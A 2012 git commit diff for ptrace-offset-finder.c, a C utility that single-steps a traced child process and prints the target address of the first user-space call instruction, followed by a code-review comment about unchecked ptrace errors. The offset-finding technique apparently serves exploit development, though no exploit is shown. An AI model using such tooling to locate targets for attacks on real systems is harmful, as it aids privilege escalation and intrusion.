author | Jason A. Donenfeld <Jason@zx2c4.com> | 2012-01-24 08:23:17 +0100 |
committer | Jason A. Donenfeld <Jason@zx2c4.com> | 2012-01-24 08:23:17 +0100 |
commit | 256a7c93c7e2e8c043a3168dc740466c4cf2b008 (patch) | |
tree | 7ec1e206c563825239f4f323b1bf7b4db2280f9d | |
parent | Add initial version of ptrace finder for x64. (diff) | |
Follow the call.
-rw-r--r-- | ptrace-offset-finder.c | 22 |
1 files changed, 18 insertions, 4 deletions
diff --git a/ptrace-offset-finder.c b/ptrace-offset-finder.c
index 34e5682..d339c18 100644
--- a/ptrace-offset-finder.c
+++ b/ptrace-offset-finder.c
@@ -1,5 +1,6 @@
 #include <stdio.h>
 #include <stdlib.h>
+#include <stdint.h>
 #include <string.h>
 #include <errno.h>
 #include <unistd.h>
@@ -9,7 +10,6 @@
 #include <sys/user.h>
 #include <sys/ptrace.h>
 #include <sys/reg.h>
-#include <asm/unistd_64.h>
 
 int main(int argc, char *argv[])
 {
@@ -31,9 +31,23 @@ int main(int argc, char *argv[])
 			ptrace(PTRACE_SINGLESTEP, child, NULL, NULL);
 			wait(NULL);
 			ptrace(PTRACE_GETREGS, child, NULL, ®s);
-			if (regs.rip < 0x700000000000) {
-				printf("0x%lx\n", regs.rip);
-				break;
+#if defined(__i386__)
+#define instruction_pointer regs.eip
+#define upper_bound 0xb0000000
+#elif defined(__x86_64__)
+#define instruction_pointer regs.rip
+#define upper_bound 0x700000000000
+#else
+#error "That platform is not supported."
+#endif
+			if (instruction_pointer < upper_bound) {
+				uint32_t instruction = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer, NULL);
+				int operator = instruction & 0xFF;
+				if (operator == 0xe8 /* call */) {
+					int32_t offset = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer + 1, NULL) + 5;
+					printf("0x%lx\n", instruction_pointer + offset);
+					break;
+				}
 			}
 		}
 	} else {
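Review bot: Both PTRACE_PEEKTEXT results inside the new `if (instruction_pointer < upper_bound)` body are used without an error check, and ptrace(2) reports a failed peek by returning -1 with errno set, which cannot be told apart from a legitimately read word; a failed second peek turns into `offset == 4` and the program prints a meaningless address. Since errno.h is already included, clear and test errno around each peek, e.g. `errno = 0;` before the call and `if (errno != 0) break;` after it. The `#if defined(__i386__)` … `#endif` block defines `instruction_pointer` and `upper_bound` from inside the loop body, which reads as if the macros were scoped there; hoisting it above `main` and annotating the second with `/* highest user-space text address expected for this ABI */` would make the heuristic visible. `int operator` is legal C but is a keyword in C++ and says little about the value; `opcode` would be clearer. The enclosing loop and `main` continue outside the hunk on both sides.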